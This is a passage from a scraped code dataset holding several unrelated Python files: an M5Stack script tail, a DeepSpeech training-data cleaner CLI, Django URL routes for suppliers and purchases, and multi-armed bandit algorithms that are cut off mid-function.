try:\n setup()\n while True:\n loop()\n except (Exception, KeyboardInterrupt) as e:\n try:\n from utility import print_error_msg\n print_error_msg(e)\n except ImportError:\n print(\"please update to latest firmware\")\n","repo_name":"davidd4375/m5stack_home_temp_co2","sub_path":"atoms3_temp.py","file_name":"atoms3_temp.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72376268852","text":"#! /usr/bin/env python\n\n\"\"\"\nVersion: 1.0.0 (Jan 10, 2019)\nAuthor: Harold Andreas Zellner - hoopiger@googlemail.com\n\n\"\"\"\n\nimport os\nimport sqlite3\nimport argparse\nimport random\nimport numpy as np\nimport re\nfrom multiprocessing import Pool , cpu_count\nfrom toolbox import tools, downloader, crawler , alphabet, transformer\n\n\n\n\ndef create_query():\n # search for query files\n files = tools.search_path(str(language_path) + 'sql_query')\n all_query = []\n query_not = []\n for found in files:\n table = str(str(found).split('/')[-1]).replace('.txt','')\n # read file only if tablename exist\n if table in sql_tables:\n querys = tools.get_file(found,True)\n if len(querys) > 0:\n # discard all unusefull stuff\n for query in querys:\n if query != '' and query != ' ':\n ind = 0\n q_set = ''\n # find and discard ! \n for q in query:\n ind += 1\n if len(query) == ind and q == '!':\n query_not.append([q_set,table])\n break\n else:\n q_set += q\n if len(query) == ind: \n all_query.append([q_set,table])\n\n sql = ''\n # get min max values from arguments or defaults\n for m in sql_minmax:\n minvalue = m[1][0]\n maxvalue = m[1][1]\n if minvalue == 0.0 and maxvalue == 0.0:\n pass\n else:\n if str(m[0]) == 'samplerate':\n minus = '-1'\n else:\n minus = ''\n if sql == '':\n sql += '(' + str(m[0]) + '>=' + str(minvalue) + str(minus) + ' and ' + str(m[0]) + '<=' + str(maxvalue)\n else:\n sql += ' and ' + str(m[0]) + '>=' + str(minvalue) + str(minus) + ' and ' + str(m[0]) + '<=' + str(maxvalue)\n if sql == '':\n sql += '(errors=0'\n else:\n sql += ' and errors=0'\n for x in range(2):\n if x == 0:\n like = 'not like'\n operator = 'and'\n query_temp = query_not\n elif x == 1:\n like = 'like'\n operator = 'or'\n query_temp = all_query\n\n sql_temp = ''\n\n\n if len(query_temp) > 0 :\n for query in query_temp:\n if sql_temp == '' and sql != '' and x == 0:\n sql_temp += ' and ' + str(query[1]) + ' ' + str(like) + ' \\'%' + str(query[0]) + '%\\''\n elif sql_temp == '' and sql != '' and x == 1:\n sql_temp += ' and (' + str(query[1]) + ' ' + str(like) + ' \\'%' + str(query[0]) + '%\\''\n else:\n sql_temp += ' ' + str(operator) + ' ' + str(query[1]) + ' ' + str(like) + ' \\'%' + str(query[0]) + '%\\''\n \n if x == 1 and sql_temp == '':\n pass\n else:\n sql += sql_temp + ')'\n \n\n return sql\n\n\n \n\n\n\n\ndef create_train_files():\n tools.printer(22,'wordlength',args.wordlength,True,model_path + 'info/training.txt')\n tools.printer(22,'numbers',args.numbers,True,model_path + 'info/training.txt')\n tools.printer(22,'upper',args.upper,True,model_path + 'info/training.txt')\n tools.printer(22,'lower',args.lower,True,model_path + 'info/training.txt')\n tools.printer(-3)\n # get sentences from db and clean them\n newlines = clean_sentences([1],True,True)\n tri_sentences = newlines[1]\n dropped = newlines[2]\n newlines = newlines[0]\n maxlines = len(newlines)\n\n test = int(round(maxlines * 0.15 ))\n train = int(float(maxlines - test * 2 ))\n random.shuffle(newlines)\n test_files = []\n train_files = []\n dev_files = []\n test_files.append('wav_filename,wav_filesize,transcript')\n train_files.append('wav_filename,wav_filesize,transcript')\n dev_files.append('wav_filename,wav_filesize,transcript')\n for line in newlines:\n if len(test_files) <= test:\n test_files.append(line)\n elif len(dev_files) <= test:\n dev_files.append(line)\n else:\n train_files.append(line)\n\n\n tools.printer(2,'all files', str(len(newlines)),True,model_path + 'info/training.txt')\n tools.printer(2,'train files', str(len(train_files)),True,model_path + 'info/training.txt')\n tools.printer(2,'test files', str(len(test_files)),True,model_path + 'info/training.txt')\n tools.printer(2,'dev files', str(len(dev_files)),True,model_path + 'info/training.txt')\n # add all sentences \n tools.create_file(tri_sentences,model_path + \"clean\")\n tools.create_file(tri_sentences,model_path + \"info/cleaned_sentences\")\n tools.create_file(dropped,model_path + \"info/dropped_sentences\")\n tools.create_file(newlines,model_path + \"all.csv\")\n tools.create_file(dev_files,model_path + \"dev.csv\")\n tools.create_file(train_files,model_path + \"train.csv\")\n tools.create_file(test_files,model_path + \"test.csv\")\n\n\n\n\n if args.notrie == False:\n if create_trie() == False:\n tools.printer(9,'couldn\\'t create lm.binary and trie', language_data[0])\n tools.printer(8,'use -nt to skip lm.binary /trie creation', language_data[0])\n return False\n\n\n\n\n # array with arguments for start_train.sh\n raw_conf = \"earlystop_nsteps,train_batch_size,dev_batch_size,test_batch_size,n_hidden,learning_rate,dropout_rate,display_step,epoch,validation_step,decoder_library_path,batch_size,n_steps,summary_secs,dropout_rate2,dropout_rate3,dropout_rate4,dropout_rate5,dropout_rate6,relu_clip,early_stop,estop_mean_thresh,estop_std_thresh,beam_width,lm_weight,beta1,beta2,epsilon,valid_word_count_weight,limit_train,limit_dev,limit_test,export_batch_size,use_seq_length,log_level,max_to_keep \"\n splits = raw_conf.split(',')\n\n # get argument values from db\n main_db[1].execute(\"select \" + str(raw_conf) + \" from configs where name='\" + str('default') + \"'\")\n index = 0\n raw_conf = main_db[1].fetchall()\n config = []\n\n \n # set right pathes\n varis = '\\n\\n\\nlm_trie_path=\"' + model_path + 'trie\" \\nlm_binary_path=\"' + model_path + 'lm.binary\" \\ncheckpoint_dir=\"' + model_path + 'checkpoints\" \\nexport_dir=\"' + model_path + 'model_export\"\\nalphabet=\"' + model_path + 'alphabet.txt' + '\"\\ntest=\"' + model_path + 'test.csv' + '\"\\ndev=\"' + model_path + 'dev.csv' + '\"\\ntrain=\"' + model_path + 'train.csv' + '\"'\n\n\n cmd = '\\n\\n\\ncd \"' + str(deepspeech_dir[0]) + '\"\\n\\npython3 DeepSpeech.py --lm_trie_path \"$lm_trie_path\" --lm_binary_path \"$lm_binary_path\" --checkpoint_dir \"$checkpoint_dir\" --export_dir \"$export_dir\" --alphabet_config_path \"$alphabet\" --train_files \"$train\" --dev_files \"$dev\" --test_files \"$test\"'\n\n # determine value types and add them\n for conf in raw_conf[0]:\n value = str(conf).strip()\n\n conf = str(splits[index]).strip()\n config.append([conf,value])\n if re.compile(r'[a-zA-Z]+').search(value):\n \n if value == 'True' or value == 'False' or re.compile(r'1e-').search(value):\n varis += '\\n' + conf + '=' + value + ''\n cmd += ' --' + conf + ' $' + conf + ''\n else:\n varis += '\\n' + conf + '=\"' + value + '\"'\n cmd += ' --' + conf + ' \"$' + conf + '\"'\n else:\n varis += '\\n' + conf + '=' + value + ''\n cmd += ' --' + conf + ' $' + conf + ''\n index += 1\n\n varis += cmd\n tools.printer(-4,varis,'',True,model_path + 'start_train.sh',True,False)\n\n\n tools.printer(-3)\n if args.notrie == True:\n tools.printer(8,'path for your own trie/lm.binary',model_path)\n tools.printer(0,'otherwise trainings script wont work\\n')\n tools.printer(2,'start training with')\n tools.printer(-1,' ↓ ')\n tools.printer(-1,'bash \"' + model_path + 'start_train.sh\"')\n\n\n return True\n\n\n\ndef create_trie():\n clean = checking_clean_corpora()\n if clean == False:\n return False\n\n\n\n raw_sentences = []\n clean_path = language_path + 'clean_raw'\n clean_model = model_path + \"clean\"\n file_cleaner(clean_path,clean_model)\n crawler.sort_remove_duplicates(clean_model)\n tools.printer(0,'\\n -----------------------------------------\\n creating trie and lm.binary\\n\\n\\n','')\n os.system('bash toolbox/make_trie.sh \"' + str(deepspeech_dir[0]) + '\" \"' + str(model_path) + '\" ' + str('3'))\n if os.path.isfile(model_path + 'trie') == False:\n return False\n else:\n return True\n\n\n\ndef clean_sentences(all_sentences,deep_create=False,analyze=False):\n\n # get overall statistics\n if analyze == True:\n sizes = [] \n durations = [] \n wordcounts = [] \n words_sec = [] \n letters = [] \n letters_sec = [] \n\n if all_sentences[0] == 0: # 0 - array of sentences\n set_sentences = all_sentences[1]\n elif all_sentences[0] == 1: # 1 - sql query \n query = create_query()\n main_db[1].execute(\"SELECT dataset,wav_path,size,text,duration,wordcount,lettercount,lettersec,wordsec from audios where \" + str(query) + \"\")\n data = main_db[1].fetchall()\n set_sentences = data\n\n counter = len(set_sentences)\n \n\n index = 0\n failer = 0\n success = 0\n cleaned = ''\n cleaned_sentences = []\n cleaned_raw = []\n dropped = []\n datasets = []\n show_index = round(counter/20)\n for set_s in set_sentences: \n\n if index % show_index == 0:\n tools.printer(0,'[' + str(round((index/counter)*100,2)) + '%]',str(index) + '/' + str(counter))\n if deep_create == True:\n text = set_s[3] \n data_dir = str(set_s[1])\n if os.path.isfile(data_dir) == False:\n cleaned = False\n\n else:\n text = set_s \n\n\n\n if args.noclean == False:\n cleaned = alphabet.sentences_cleaner(prepare,str(text),language_data[0],args.upper,num_activ,args.lower)\n else:\n cleaned = str(text).replace('\\n',' ')\n if args.upper == False:\n cleaned = cleaned.lower()\n\n if cleaned == False: \n failer += 1\n dropped.append(str(text))\n else:\n success += 1 \n if analyze == True:\n if set_s[0] in datasets:\n pass\n else:\n datasets.append(set_s[0])\n sizes.append(set_s[2]) \n durations.append(set_s[4]) \n wordcounts.append(set_s[5]) \n letters.append(set_s[6]) \n letters_sec.append(set_s[7]) \n words_sec.append(set_s[8]) \n\n if deep_create == True:\n cleaned_sentences.append(data_dir + ',' + str(set_s[2]) + ',' + cleaned)\n cleaned_raw.append(str(cleaned))\n else:\n cleaned_sentences.append(str(cleaned)) \n\n\n\n\n index += 1\n\n print()\n\n # exit if no sentences\n if deep_create == True and len(cleaned_sentences) == 0:\n tools.printer(9,'no sentences found or all failed','')\n tools.printer(88,'try other parameters','')\n tools.printer(99,'python3 deepspeech_cleaner.py --help\" for help','')\n close_db(2,True)\n\n\n if analyze == True:\n tools.printer(11,'info:','',True,model_path + 'info/training.txt')\n tools.printer(2,'corpora','-'.join(datasets),True,model_path + 'info/training.txt') \n tools.get_size(sizes,'size',model_path + \"info/training.txt\")\n all_duration = tools.get_size(durations,'duration',model_path + \"info/training.txt\")\n all_words = tools.get_size(wordcounts,'words',model_path + \"info/training.txt\")\n all_letters = tools.get_size(letters,'letters',model_path + \"info/training.txt\")\n tools.printer(2,'words per sec',round(all_words/all_duration,2),True,model_path + 'info/training.txt')\n tools.printer(2,'letters per sec',round(all_letters/all_duration,2),True,model_path + 'info/training.txt')\n\n return [cleaned_sentences,cleaned_raw,dropped]\n\n\n\n\n\n\n\n\ndef multi_cleaner(inputs):\n if args.max < 1:\n args.max = 1\n\n index = 0\n startrange = inputs[0]\n endrange = inputs[1]\n\n failer = 0\n success = 0\n counter = endrange-startrange\n all_sentences = []\n show_index = 100000\n if inputs[4] == 0:\n show_index = round(counter/200)\n\n\n with open(inputs[2], 'r') as f:\n for text in f:\n if index >= startrange and index <= endrange:\n\n if args.noclean == False:\n cleaned = alphabet.sentences_cleaner(prepare,str(text),language_data[0],args.upper,num_activ,args.lower)\n else:\n cleaned = str(text)\n if args.upper == False:\n cleaned = cleaned.lower()\n\n\n\n\n if cleaned == False: \n failer += 1\n\n else:\n success += 1 \n all_sentences.append(str(cleaned))\n if index % show_index == 0 and inputs[4] == 0:\n\n tools.printer(0,'[' + str(round((index/counter)*100,2)) + '%]',)\n\n\n\n\n if len(all_sentences) > args.max:\n tools.create_file(all_sentences,inputs[3],'a')\n all_sentences = []\n\n\n\n \n index += 1\n \n f.close\n\n if len(all_sentences) > 0:\n tools.create_file(all_sentences,inputs[3],'a')\n\n \n\n \n\n\n\n\n\ndef file_cleaner(path,targetpath):\n counter = 0\n all_process = []\n\n with open(path, 'r') as f:\n for text in f:\n counter += 1\n\n cpus = get_process_count()\n\n \n steps = round(counter/cpus)\n start = 0\n end = 0\n current = 0\n for p in range(cpus):\n\n start = current\n current += steps\n\n if p+1 == cpus:\n end = counter\n else: \n end = current\n \n\n \n all_process.append([start,end,path,targetpath,p])\n\n\n tools.printer(2,'cleaning',path)\n tools.printer(2,' ',targetpath)\n tools.printer(2,'processing',cpus)\n with Pool(cpus) as p:\n return p.map(multi_cleaner, all_process)\n\n\n\n\n\n\n\n\n \n\n\ndef model_check():\n new_path = model_path\n new_model = current_model\n tools.printer(11,'training',new_model)\n if os.path.isdir(new_path) == True:\n tools.printer(8,'already trainings file for',new_model)\n u_input = tools.get_inputs([['d','delete and recreate',0],['c','choose another trainings name',0]],'',True,True)\n if u_input == 'd':\n tools.delete_all(new_path)\n elif u_input == 'c':\n while True:\n new_model = input(\" new name for training\\n\\n--:\")\n new_path = current_dir + '/languages/' + str(language_data[0]) + '/training/' + new_model + '/'\n if os.path.isdir(new_path) == False:\n break\n elif new_model in ['q','Q']:\n return [False]\n print()\n tools.printer(8,'already trainings file for',new_model)\n elif new_model in ['q','Q']:\n return [False]\n else:\n return [False]\n\n\n tools.create_folder(current_dir,new_model,'create',language_data[0])\n\n tools.printer(-3,'','',True,new_path + 'info/training.txt',True,False)\n return [True,new_model,new_path]\n\n\n\n \n\n\ndef create_clean_corpora(append=False):\n\n tools.printer(99,'need to download clean corpora')\n corporas = downloader.check_corpora(language_data,'[\\'0\\']',1)\n if len(corporas) == 0:\n tools.printer(8,'no clean corpora',str(language_data[0]))\n tools.printer(0,'trying to crawl one')\n tools.printer(-3)\n crawler.crawl_corpora(args.process,language_data[0],language_path,10,append)\n \n\n else:\n tools.printer(2,'downloading clean corpora','')\n downloader.download_clean(corporas[0][0],language_path)\n return True\n\n\ndef checking_clean_corpora():\n\n if os.path.isfile(language_path + 'clean_raw') == False:\n create_clean_corpora()\n else:\n\n clean_size = round(os.path.getsize(language_path + 'clean_raw')/1000000000,3)\n tools.printer(2,'found clean corpora')\n tools.printer(0,'size',str(clean_size) + 'GB')\n return True\n\n\n\n\ndef get_prepare():\n # array of replacer\n replacer = alphabet.get_replacer(language_data[0])\n # selected alphabet - upper/lower for regex\n if args.wordlength < 0:\n args.wordlength = 0\n\n alpha = alphabet.get_letters(language_data[0],args.upper,False,args.wordlength,args.numbers)\n return [alpha,replacer[0],replacer[1],args.numbers]\n\n\n\ndef get_process_count():\n cpus = args.process\n real_cpus = max(1, cpu_count() - 1)\n if cpus == 0 or cpus > real_cpus:\n cpus = real_cpus\n return cpus\n\ndef close_db(which=0,leave=False):\n if which == 0 or which == 1:\n language_data[4].close()\n if which == 0 or which == 2:\n main_db[0].close()\n\n if leave == True:\n tools.printer(-3)\n exit(1)\n\n\n\ndef error_flag():\n if sec_input == '':\n tools.printer(8,'no audio path')\n array = [tools.get_inputs([['wav_path','audio path from db',1],['audios_id','audio id from db',5]],'',True,True)]\n else:\n array = [sec_input]\n try:\n sql_test = \"select audios_id from audios where audios_id=\" + str(int(array[0])) + \"\"\n sql = \"update audios set errors=9 where wav_path=\" + str(int(array[0])) + \"\"\n except:\n\n\n sql_test = \"select audios_id from audios where wav_path='\" + str(array[0]) + \"'\"\n sql = \"update audios set errors=9 where wav_path='\" + str(array[0]) + \"'\"\n\n if str(array[0]) == 'unflag':\n tools.printer(22,'all errors are unflagged',array[0])\n main_db[1].execute('update audios set errors=0')\n main_db[0].commit()\n else:\n main_db[1].execute(sql_test)\n test = main_db[1].fetchall()\n if len(test) > 0:\n tools.printer(22,'error flagged',array[0])\n main_db[1].execute(sql)\n main_db[0].commit()\n else:\n tools.printer(9,'not found',array[0])\n\ndef test_sentences():\n if sec_input == '':\n tools.printer(8,'no test input')\n array = [tools.get_inputs([['','sentences or path',-1]],'',True,True)]\n\n if os.path.isfile(sec_input) == True:\n array = tools.get_file(sec_input,True)\n elif sec_input != '':\n array = [sec_input] \n\n print()\n for arr in array:\n cleaned = alphabet.sentences_cleaner(prepare,str(arr),language_data[0],args.upper,num_activ,args.lower)\n if cleaned == False: \n tools.printer(8,arr + '\\n')\n else:\n tools.printer(2, arr)\n tools.printer(22,cleaned + '\\n')\n\n\ndef start_download():\n corporas = tools.get_min_max(str(args.corpora),1)\n tools.printer(-3)\n tools.printer(1,'Downloader\\n')\n corporas = downloader.check_corpora(language_data,corporas,0)\n downloader.download(current_dir,language_path + 'datasets/' ,main_db,language_data[0],corporas)\n\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='DeepSpeech Dataset Downloader/Combiner/Cleaner')\n parser.add_argument('mode',help=\"\"\"\n download - [download corpora if available]------------\n crawl - [download/clean wiki dumps for lm.binary/trie]\n create - [create training files]----------------------\n insert - [insert corpus in db]------------------------\n convert - [convert audio files from database]---------\n trimm - [trimm all audio files start/end]-------------\n trimmsilence - [vad only start/end]-------------------\n clean_db - [delete all missing files in db]-----------\n save - [autosave arguments for each language on/off]--\n test - [test single sentence or file]-----------------\n error - [error flag audio files with path/id]---------\"\"\",nargs='+',type=str)\n\n parser.add_argument('-t','--training',help=\" path to model files [%(default)s]\", default='standard', type=str)\n parser.add_argument('-c','--corpora',help=\"which corpora - 0=all [0]\", default='default', type=str)\n parser.add_argument('-u','--upper',help=\"use upper and lowercase [False]\", default=False, type=bool)\n parser.add_argument('-n','--numbers',help=\"allow numbers [False]\", default=False, type=bool)\n parser.add_argument('-lo','--lower',help=\"replacer round to turn sentence to lowercase - only if -u/--upper=False [0]\", default=0, type=int)\n parser.add_argument('-l','--lang',help=\"available [it|hu|hr|pt|sv|fi|el|da|nn|lv|lt|bg|bs|sl|sk|is|en|uk|de|tr|ru|ro|es|fr|nl|pl|sq|cs|sr|et]\", default='default', type=str)\n parser.add_argument('-nc','--noclean',help=\"don't clean sentences\", default=False, type=bool)\n parser.add_argument('-nt','--notrie',help=\"no trie/lm.binary creation [False]\", default=False, type=bool)\n parser.add_argument('-s','--size',help=\"select min-max file size - 0=off [500-100000]\", default='default', type=str)\n parser.add_argument('-d','--duration',help=\"select min-max duration in sec - 0=off [1.5-9.9]\", default='default', type=str)\n parser.add_argument('-wc','--wordcount',help=\"select min-max words - 0=off [10-22]\", default='default', type=str)\n parser.add_argument('-ws','--wordsec',help=\"select min-max words per sec - 0=off [0.5-1.7]\", default='default', type=str)\n parser.add_argument('-wl','--wordlength',help=\"select minimum letters for a word - 0=off [0]\", default=0, type=int)\n parser.add_argument('-lc','--lettercount',help=\"select min-max letters - 0=off [10-22]\", default='default', type=str)\n parser.add_argument('-ls','--lettersec',help=\"select min-max letters per sec - 0=off [1.1-10.2]\", default='default', type=str)\n parser.add_argument('-b','--bitrate',help=\"select min-max bitrate - 0=off [8-16]\", default='default', type=str)\n parser.add_argument('-sa','--samplerate',help=\"select min-max samplerate - 0=off [16000-22000]\", default='default', type=str)\n parser.add_argument('-se','--sectors',help=\"select min-max sectors - 0=off [221-505]\", default='default', type=str)\n parser.add_argument('-ch','--channels',help=\"select min-max channels - 0=off [1-2]\", default='default', type=str)\n parser.add_argument('-uv','--upvotes',help=\"select min-max upvotes - 0=off [0-3]\", default='default', type=str)\n parser.add_argument('-dv','--downvotes',help=\"select min-max downvotes - 0=off [0-3]\", default='default', type=str)\n parser.add_argument('-cs','--convert_settings',help=\"change audio output settings [\\\"wav 16000 1 16 signed-integer\\\"]\", default='wav 16000 1 16 signed-integer', type=str)\n parser.add_argument('-ts','--trimm_settings',help=\"change audio trimm settings [\\\"0.5 0.5\\\"]\", default='default', type=str)\n parser.add_argument('-ps','--process',help=\"how many processes should be used - 0=one per cpu [0]\", default=0, type=int)\n parser.add_argument('-m','--max',help=\"max sentences in ram before writing to file [1000]\", default=1000, type=int)\n\n\n args = parser.parse_args()\n\n if len(args.mode) == 0:\n mode = 'help'\n else:\n mode = args.mode[0]\n\n if len(args.mode) == 1:\n sec_input = ''\n elif len(args.mode) > 1:\n sec_input = ' '.join(args.mode[1:])\n\n\n\n\n\n if mode == 'help':\n pass\n else:\n current_dir = tools.check_dir()\n language_data = alphabet.get_default_lang(args.lang,True)\n main_db = alphabet.get_db(language_data)\n deepspeech_dir = tools.check_deepspeech(language_data)\n if deepspeech_dir[0] == False:\n mode = '_'\n else:\n \n tools.printer(-3,'','')\n tools.printer(1,'Language',language_data[2])\n tools.printer(0,'',language_data[0])\n language_path = current_dir + '/languages/' + str(language_data[0]) + '/'\n # check if num2words got language support\n num_activ = alphabet.check_num2words(language_data[0])\n prepare = get_prepare()\n\n\n if mode == 'create':\n\n tools.printer(-3)\n tools.printer(1,'Creator\\n')\n sql_minmax = [['size',[]],['duration',[]],['bitrate',[]],['samplerate',[]],['channels',[]],['wordcount',[]],['wordsec',[]],['lettercount',[]],['lettersec',[]],['upvotes',[]],['downvotes',[]],['sectors',[]]]\n sql_tables = ['age','dataset','dialect','gender','speaker','text','wav_path']\n\n current_model = args.training\n model_path = current_dir + '/languages/' + str(language_data[0]) + '/training/' + current_model + '/'\n\n current_model = model_check()\n if current_model[0] == False:\n close_db(0,True)\n else:\n model_path = current_model[2]\n current_model = current_model[1]\n\n tools.printer(11,'options:','',True,model_path + 'info/training.txt')\n for x in range(len(sql_minmax)):\n sql_minmax[x][1] = tools.get_min_max(eval('args.' + str(sql_minmax[x][0]) + ''),0,sql_minmax[x][0],language_data[3],model_path + 'info/training.txt',deepspeech_dir[1])\n\n\n language_data[4].commit()\n\n \n\n\n create_train_files()\n\n\n elif mode == 'error':\n error_flag()\n\n\n elif mode == 'insert':\n tools.printer(-3)\n tools.printer(1,'Inserter\\n')\n\n if sec_input == '':\n tools.printer(8,'no path selected','')\n corpus_path = tools.get_inputs([['','',2]],'enter corpus path',True,True)\n else:\n corpus_path = sec_input\n\n if corpus_path != False:\n tools.printer(2,'found path',str(corpus_path))\n downloader.insert_corpora(corpus_path,True,main_db,language_data[0])\n else:\n tools.printer(9,'path not found',str(corpus_path))\n\n\n\n\n\n elif mode == 'test' or mode == 'testing' :\n\n \n tools.printer(-3)\n tools.printer(1,'Replacement Tester\\n')\n test_sentences()\n\n \n elif mode == 'crawl':\n tools.printer(-3)\n tools.printer(1,'Crawler\\n')\n crawler.crawl_corpora(get_process_count(),language_data[0],language_path,20,False)\n tools.printer(1,'crawling complete')\n\n elif mode == 'convert' or mode == 'trimm' or mode == 'trimmsilence':\n tools.printer(-3)\n tools.printer(1,'Audio Transformer\\n')\n\n transformer.convert_all(mode,get_process_count(),main_db,args.convert_settings,args.trimm_settings)\n\n tools.printer(2,mode,'done')\n\n elif mode == 'download':\n start_download()\n elif mode == 'clean_db':\n alphabet.clean_database(main_db)\n\n\n elif mode == 'save':\n tools.autosave_toggle(language_data)\n\n\n elif mode == '_':\n tools.printer(11,'quit')\n pass\n else:\n\n\n parser.print_help()\n exit(1)\n\n\n\n close_db(0,True)\n\n\n","repo_name":"silenterus/deepspeech-cleaner","sub_path":"deepspeech_cleaner.py","file_name":"deepspeech_cleaner.py","file_ext":"py","file_size_in_byte":27244,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"21"} +{"seq_id":"3418250737","text":"from django.urls import path, include\n\nfrom .views import ProveedorView,ProveedorNew, ProveedorEdit, \\\n proveedorInactivar, ProveedorDel, ComprasView, compras, ComprasDetDelete\n\n\n\nurlpatterns = [\n path('proveedores/',ProveedorView.as_view(), name=\"proveedor_list\"),\n path('proveedores/new',ProveedorNew.as_view(), name=\"proveedor_new\"),\n path('proveedores/edit/',ProveedorEdit.as_view(), name=\"proveedor_edit\"),\n path('proveedores/inactivar/',proveedorInactivar, name=\"proveedor_inactivar\"),\n path('proveedores/delete/', ProveedorDel.as_view(), name='proveedor_del'),\n \n path('compras/',ComprasView.as_view(), name=\"compras_list\"),\n path('compras/new',compras, name='compras_new'),\n path('compras/edit/',compras, name=\"compras_edit\"),\n # path('proveedores/inactivar/',proveedorInactivar, name=\"proveedor_inactivar\"),\n # path('proveedores/delete/', ProveedorDel.as_view(), name='proveedor_del'),\n path('compras//delete/',ComprasDetDelete.as_view(), name=\"compras_del\"),\n]","repo_name":"eze-fayu/sistema-facturacion","sub_path":"app/cmp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15709538522","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef get_optimal_action(bandit):\n \"\"\"\n Returns the best action of a bandit.\n\n Args:\n bandit (list): Contains mean and std / reward for each k.\n\n Returns:\n int: Index of best action\n \"\"\"\n max_R = [sum(x) if isinstance(x, tuple) else x for x in bandit]\n return max_R.index(max(max_R))\n\n\ndef argmax(Q):\n \"\"\"\n Returns index of maximum Q. Breaks ties randomly.\n\n Args:\n Q (np.array): Q values for the different k.\n\n Returns:\n int: Index of maximum Q.\n \"\"\"\n return np.random.choice(np.flatnonzero(Q == Q.max()))\n\n\ndef get_probabilities_action(H):\n \"\"\"\n Computes the probabilities of selection given H.\n\n Args:\n H (np.array): Preference for each action.\n\n Returns:\n np.array: Probability vector.\n \"\"\"\n return np.exp(H) / np.sum(np.exp(H))\n\n\ndef run_bandit_gradient(bandit, num_steps, alpha, baseline=True):\n \"\"\"\n Computes the gradient bandit algorithm.\n\n Args:\n bandit (list): Contains mean and std / reward for each k. \n num_steps (int): Total number of steps of the simulation. \n alpha (int): Weight of recent rewards.\n baseline (bool, optional): Use baseline rewards. Defaults to True.\n\n Returns:\n H (np.array): Preference for each action.\n R (np.array): Reward obtained at each time step.\n A (np.array): Action at each time step.\n \"\"\"\n k = len(bandit)\n actions = range(k)\n H = np.zeros((k, ))\n R = np.zeros((num_steps, ))\n R_mean = 0\n A = np.zeros((num_steps, ))\n best_action = get_optimal_action(bandit)\n for iteration in range(num_steps):\n prob = get_probabilities_action(H)\n idx = np.random.choice(actions, p=prob)\n mean, std = bandit[idx]\n R[iteration] = np.random.normal(mean, std)\n A[iteration] = 1 if idx == best_action else 0\n if baseline:\n R_mean += 1 / (iteration + 1) * (R[iteration] - R_mean)\n for action in actions:\n if action == idx:\n update = alpha * (R[iteration] - R_mean) * (1 - prob[action])\n H[action] += update if not np.isnan(update) else 0\n else:\n update = alpha * (R[iteration] - R_mean) * prob[action]\n H[action] -= update if not np.isnan(update) else 0\n return H, R, A\n\n\ndef run_bandit_ucb(bandit, num_steps, alpha=None, initial_values=None, c=1):\n \"\"\"\n Computes the Upper-Confidence-Bound action selection algorithm.\n\n Args:\n bandit (list): Contains mean and std / reward for each k. \n num_steps (int): Total number of steps of the simulation. \n alpha (int, optional): Weight of recent rewards. Defaults to None.\n initial_values (np.array, optional): Initial Q values. Defaults to None.\n c (int, optional): Confidence bound parameter. Defaults to 1.\n\n Returns:\n H (np.array): Preference for each action.\n R (np.array): Reward obtained at each time step.\n A (np.array): Action at each time step.\n \"\"\"\n k = len(bandit)\n if initial_values is None:\n Q = np.zeros((k, ))\n else:\n assert initial_values.shape == (k, )\n Q = initial_values.copy()\n N = np.zeros((k, ))\n R = np.zeros((num_steps, ))\n A = np.zeros((num_steps, ))\n best_action = get_optimal_action(bandit)\n for iteration in range(num_steps):\n action_upb = Q + c * np.sqrt(np.log(iteration) / N)\n action_upb[np.where(np.isnan(action_upb))] = np.inf\n idx = argmax(action_upb)\n mean, std = bandit[idx]\n R[iteration] = np.random.normal(mean, std)\n A[iteration] = 1 if idx == best_action else 0\n if alpha is None:\n N[idx] += 1\n Q[idx] += (1 / (N[idx])) * (R[iteration] - Q[idx])\n else:\n Q[idx] += alpha * (R[iteration] - Q[idx])\n return Q, R, A\n\n\ndef run_bandit_stat(bandit, num_steps, epsilon, alpha=None, initial_values=None):\n \"\"\"\n Runs the epsilon-greedy stationary problem.\n\n Args:\n bandit (list): Contains mean and std / reward for each k. \n num_steps (int): Total number of steps of the simulation. \n epsilon (int): Probability of not selecting optimal action.\n alpha (int, optional): Weight of recent rewards. Defaults to None.\n initial_values (np.array, optional): Initial Q values. Defaults to None.\n\n Returns:\n H (np.array): Preference for each action.\n R (np.array): Reward obtained at each time step.\n A (np.array): Action at each time step.\n \"\"\"\n k = len(bandit)\n if initial_values is None:\n Q = np.zeros((k, ))\n else:\n assert initial_values.shape == (k, )\n Q = initial_values.copy()\n N = np.zeros((k, ))\n R = np.zeros((num_steps, ))\n A = np.zeros((num_steps, ))\n best_action = get_optimal_action(bandit)\n for iteration in range(num_steps):\n if np.random.random() > epsilon:\n idx = argmax(Q == Q.max())\n else:\n idx = np.random.choice(k)\n mean, std = bandit[idx]\n R[iteration] = np.random.normal(mean, std)\n A[iteration] = 1 if idx == best_action else 0\n if alpha is None:\n N[idx] += 1\n Q[idx] += (1 / (N[idx])) * (R[iteration] - Q[idx])\n else:\n Q[idx] += alpha * (R[iteration] - Q[idx])\n return Q, R, A\n\n\ndef run_bandit_nonstat(k, num_steps, epsilon, alpha, initial_values=None):\n \"\"\"\n Runs the epislon-greedy nonstationary problem. Bandits are initialized at 0\n and are updated at each step.\n\n Args:\n k (int): Number of different actions in bandit.\n num_steps (int): Total number of steps of the simulation. \n epsilon (int): Probability of not selecting optimal action.\n alpha (int, optional): Weight of recent rewards. Defaults to None.\n initial_values (np.array, optional): Initial Q values. Defaults to None.\n\n Returns:\n H (np.array): Preference for each action.\n R (np.array): Reward obtained at each time step.\n A (np.array): Action at each time step.\n \"\"\"\n if initial_values is None:\n Q = np.zeros((k, ))\n else:\n assert initial_values.shape == (k, )\n Q = initial_values.copy()\n R = np.zeros((num_steps, ))\n A = np.zeros((num_steps, ))\n bandit = [0 for idx in range(k)]\n for iteration in range(num_steps):\n if np.random.random() > epsilon:\n idx = argmax(Q == Q.max())\n else:\n idx = np.random.choice(k)\n R[iteration] = bandit[idx]\n best_action = get_optimal_action(bandit)\n A[iteration] = 1 if idx == best_action else 0\n Q[idx] += alpha * (R[iteration] - Q[idx])\n for idx in range(k):\n bandit[idx] += np.random.normal(0, 0.01)\n return Q, R, 